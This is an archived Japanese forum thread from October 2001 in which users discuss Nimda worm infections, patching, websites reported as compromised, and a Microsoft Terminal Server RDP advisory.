389 :名無しさん@お腹いっぱい。:01/10/14 21:51
今日、Windows2000Server入れて、ダイアルアップの設定を確認したついでに2,3調べ物をしたら
nimdaに感染してしまった。trendmicroのdosベースの駆除プログラムで潰した。
まだお盛んのようだな。早速パッチを当てよう。

390 ::01/10/14 22:06
>>389
今のご時世、パッチ当ててからネットに繋ぐが吉。
パッチファイル自体はネットから持ってこなくちゃいかんが。

391 :名無しさん@お腹いっぱい。:01/10/15 03:24
そのパッチがあるのはM$の鯖。。。

392 :うみがえる:01/10/15 03:32
Nimdaって本当に感染力が強いですよね.

ところで,炭疽菌の封筒の消印は9月18日らしいですね.
Nimdaも18日頃からですね.

393 ::01/10/15 03:34
>>392
関連付けたいみたいだけど、関係ないと思うよ。

394 :うみがえる:01/10/15 08:15
虎さん,どうも
関係ないなら良いです.
未知の仕掛けとかが在ると嫌だな思ったもので.(ニムダに)

395 :名無しさん@お腹いっぱい。:01/10/15 09:45
ネットスケープ系のブラウザでページ見ても感染するの?
その事に関しては情報入ってこないんだけど?
当方、4.04使用。javaとかでひっかかるかなぁ?

396 :名無しさん@お腹いっぱい。:01/10/15 16:54
>>395

>ネットスケープ系のブラウザでページ見ても感染するの?

見ただけでは感染しませんが、ネットスケープ系のブラウザで感染することは可能です。

397 :ニムダくんさようなら:01/10/15 22:55
http://www.maruhati.co.jp/
改竄の上 NIMDA持ち とほほ

398 :ニムダくんさようなら:01/10/15 22:58
詳細
https://www.netsecurity.ne.jp/article/9/3017.html

コンパック3度目の改竄
バックドア放置の
http://www.apec.co.jpも紹介

399 :32@mm:01/10/15 23:12
今日メールに添付ファイル開いたら 感染しちった.
ノートンの体験版使ってもだめだったYO
OSはwinXP

400 :名無しさん@お腹いっぱい。:01/10/16 01:52
いくらウイルススキャンしてもひっかかんないのに
少したてばCドライブにTFTPファイルが… (゚Д゚)

401 :名無しさん@お腹いっぱい。:01/10/16 08:39
>>399
Nimdaメールが送られてきたってことかにゃ?

402 :本物の1:01/10/17 01:02
最近ネタがすっかり減ってお迎えも来たようです(w

http://www.ipa.go.jp/security/crack_report/20011005/0109.html
IPAの報告書ではnimdaやCoderedの扱いが不正アクセスにも扱われているようなんだけど
法律の定義で言う不正アクセスとは違うんだよね。
同じ名称使わずになんとかしてくれないかなー。
ワームに感染すると不正アクセスで逮捕されると勘違いさせておいた方がよいような気もするれどね。

403 :名無しさん@お腹いっぱい。:01/10/19 19:49
>>402

うーん。
これを読んでいると、いわゆるハッキング(クラッキング)と、CodeRedのと、「不正アクセス」の境界があいまいになってきているようにも感じます・・。

■ワーム新時代:危険性が一段と増加
http://japan.cnet.com/News/2001/Item/011019-2.html?mn
これからのコンピューター・ワームは、ウイルスとハッカー攻撃をうま
く組み合わせることで一段と破壊力が増す可能性が高いという。感染し
た添付メールを開くという行為を介在させずに広がる『Code Red』と
『Nimda』はその先駆けで、セキュリティー会社はウイルス駆除だけを
扱っていては生き残れない。

404 :名無しさん@お腹いっぱい。:01/10/23 22:24
懐かしのこのサイトが再び・・。

http://www.hyundaijapan.co.jp/

405 :名無しさん@お腹いっぱい。:01/10/24 13:36
台湾政府からNimdaのパケットが飛んできたよ・・・
gov.tw

406 :省吾広告屋:01/10/25 14:44
<A HREF="mailto:abuse@mail.postmasterglobal.com"> abuse@mail.postmasterglobal.com </A>

<A HREF="mailto:RealBigDeal@mail.postmasterglobal.com"> RealBigDeal@mail.postmasterglobal.com </A>

今さら? CodeRed  Nimda
211.13.210.40
http://211.13.210.40/

株式会社サイバービジョン (CyberVision Co.,Ltd.)
CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.)
SUBA-200-C07 [サブアロケーション] 211.13.210.0

Copyleft (C) 水泥棒菊池Mツトム県奥様濃ゆ軍西米良し村所1偏屈ババア菊池記念館在住村ヤク場役人が水泥棒を止めません。
クソ猿しいやどけてんろ禿タコゴリラ貝市来(いちき)日通りドライバーMツトム県@三原名誉会長9臭ダイワ運湯5老出身白熊桜島高利貸アイス本社労再無視

文責 スッポン放送汚れ穴ウンサーチャッキー恩田

407 :名無しさん@お腹いっぱい。:01/10/25 22:43
NHKでやってたよあげ

408 : ◆NoKKOfSw :01/10/25 22:43
>>407
見たけどたいした内容じゃなかったsage

409 :名無しさん@お腹いっぱい。:01/10/26 09:43
>>406もう少し簡便に書いてくれsage

410 :名無しさん@お腹いっぱい。:01/10/26 17:13

こんなんあったが、おらよくわかんねえだ。
どうしたらいいだか?

https://www.netsecurity.ne.jp/article/1/3109.html
Windows NT4.0および2000のターミナル・サーバの脆弱性を修正するプログラムを
リリース(マイクロソフト)(2001.10.25)
 マイクロソフト株式会社は、Windows NT4.0およびWindows 2000のターミナル・サーバの
脆弱性を修正するプログラムをリリースした。これらサーバが実装する
Remote Data Protocol(RDP)は特殊な連続したデータパケットを正しく処理できないため、
無効なRDPデータを受信した場合、サーバが異常終了することがあるとのこと。再起動する
ことによりサービス再開は可能で、この脆弱性を利用してターミナル サーバ セッションの
セキュリティの侵害やサーバのデータの追加、変更、削除はできない。現在、NT4.0
日本語版向けプログラムは準備中。2000向けは日本語版がダウンロード可能。

411 :名無しさん@お腹いっぱい。:01/10/26 17:19
>>410
あんた、NT 4.0 Terminal Service Edition か、2000 Server
使ってるのか? そうでなければ関係ねえべ。

412 :名無しさん@お腹いっぱい。:01/10/26 18:28
>>411
おお、んだなや。おらんなの使ってねえだ。
ういんどうづに穴っつうと心配になるだよ。
ありがとうなぁm(_ _)m

112 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)